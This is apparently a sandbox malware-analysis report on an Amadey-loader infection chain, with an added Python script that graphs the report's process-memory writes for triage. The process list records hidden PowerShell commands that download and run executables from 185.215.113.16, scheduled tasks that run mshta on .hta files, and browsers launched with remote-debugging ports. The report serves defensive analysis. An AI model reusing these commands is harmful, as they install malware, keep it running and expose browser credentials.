PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
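
Added example, not part of the sandbox output: a Python script that collapses the "wrote to memory" rows above into unique writer/writee edges with event counts, flags the edges worth a second look, and rebuilds the write chains fanning out from the Amadey loader skotes.exe (PID 3652). ROWS is a subset of this report's own table; the three heuristics (a binary dropped in %TEMP% writing into a fresh copy of itself, driving a LOLBin, or writing into a browser) and the LOLBINS/BROWSERS lists are this example's own, not sandbox signatures. One caveat when reading these rows: a parent also writes into the child it creates, so a single write into cmd.exe or mshta.exe is ordinary process creation; the repeated writes from KsqTMuf.exe into a second KsqTMuf.exe are the stronger hollowing indicator.

```python
"""Collapse the 'wrote to memory' rows into a weighted writer->writee graph and
flag the patterns worth a second look. Added example; not part of the sandbox
report. ROWS is a subset of the report's own table, in its own column order."""
import re
from collections import Counter

ROWS = r"""
PID 3652 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 3652 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 3652 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 3652 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
PID 720 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\cmd.exe
PID 720 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\mshta.exe
PID 4972 wrote to memory of 3724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4108 wrote to memory of 2036 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4420 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 3268 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
"""

# Row layout of the report: PID <src> wrote to memory of <dst> N/A <src image> <dst image>
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?\.exe) (.+?\.exe)$", re.I)
# Lists of this example, not sandbox signatures.
LOLBINS = {"cmd.exe", "mshta.exe", "powershell.exe", "schtasks.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def in_user_temp(path):
    return "\\appdata\\local\\temp\\" in path.lower()


def parse_rows(text):
    """One (src_pid, dst_pid, src_image, dst_image) tuple per logged write event."""
    edges = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            src, dst, src_img, dst_img = m.groups()
            edges.append((int(src), int(dst), src_img, dst_img))
    return edges


def collapse(edges):
    """Unique edge -> number of write events the sandbox logged for it."""
    return Counter(edges)


def triage(edges):
    """Heuristics applied only to writers living in the user's %TEMP%; writers under
    Program Files / System32 (Chrome spawning its own children) are expected."""
    findings = []
    for (src, dst, src_img, dst_img), n in collapse(edges).items():
        s, d = basename(src_img), basename(dst_img)
        if not in_user_temp(src_img):
            continue
        if s == d and src != dst:
            findings.append((src, dst, f"{n} write(s) into a fresh copy of itself ({s}): hollowing/RunPE pattern"))
        elif d in LOLBINS:
            findings.append((src, dst, f"dropped {s} drives LOLBin {d} ({n} write(s))"))
        elif d in BROWSERS:
            findings.append((src, dst, f"dropped {s} controls browser {d} ({n} write(s))"))
    return findings


def chains(edges, root):
    """Every writer->writee path starting at PID `root`, as image basenames."""
    children, names = {}, {}
    for src, dst, src_img, dst_img in collapse(edges):
        children.setdefault(src, []).append(dst)
        names[src], names[dst] = basename(src_img), basename(dst_img)
    paths = []

    def walk(pid, path):
        if pid not in children:          # leaf: nothing was written from here
            paths.append(path)
        for kid in children.get(pid, []):
            walk(kid, path + [names[kid]])

    walk(root, [names.get(root, str(root))])
    return paths


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    for (src, dst, src_img, dst_img), n in collapse(edges).items():
        print(n, src, basename(src_img), "->", dst, basename(dst_img))
    for src, dst, msg in triage(edges):
        print(f"[{src}->{dst}] {msg}")
    for path in chains(edges, 3652):
        print(" > ".join(path))
```

Run as a script it prints the collapsed edges, the findings and the five write chains rooted at PID 3652 (loader > KsqTMuf.exe > KsqTMuf.exe, loader > 32dbcb8133.exe > cmd.exe > schtasks.exe, loader > 32dbcb8133.exe > mshta.exe > powershell.exe, and the two lFlj2tl.exe > chrome.exe > chrome.exe branches). Fed the full table instead of the subset, the per-edge counts grow but the edge set and the findings stay the same.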

Processes

C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe

"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2672 -ip 2672

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 796

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"

C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff993bbcc40,0x7ff993bbcc4c,0x7ff993bbcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1828 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4256 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4432,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE

"C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4736,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4944 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1728 -s 1712

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "nLlCHmaz9jk" /tr "mshta \"C:\Temp\f71Q9b6DZ.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\f71Q9b6DZ.hta"

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9988446f8,0x7ff998844708,0x7ff998844718

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3008 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe

"C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe

"C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\2n790" & exit

C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe

"C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe

"C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe"

C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe

"C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5956 -ip 5956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 808

C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe

"C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"

C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe

"C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"

C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe

"C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe"

C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe

"C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9af06cc40,0x7ff9af06cc4c,0x7ff9af06cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2052 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2100 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2504 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3828,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4584,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe

"C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Program Files\Google\Chrome\Application\chrome.exe

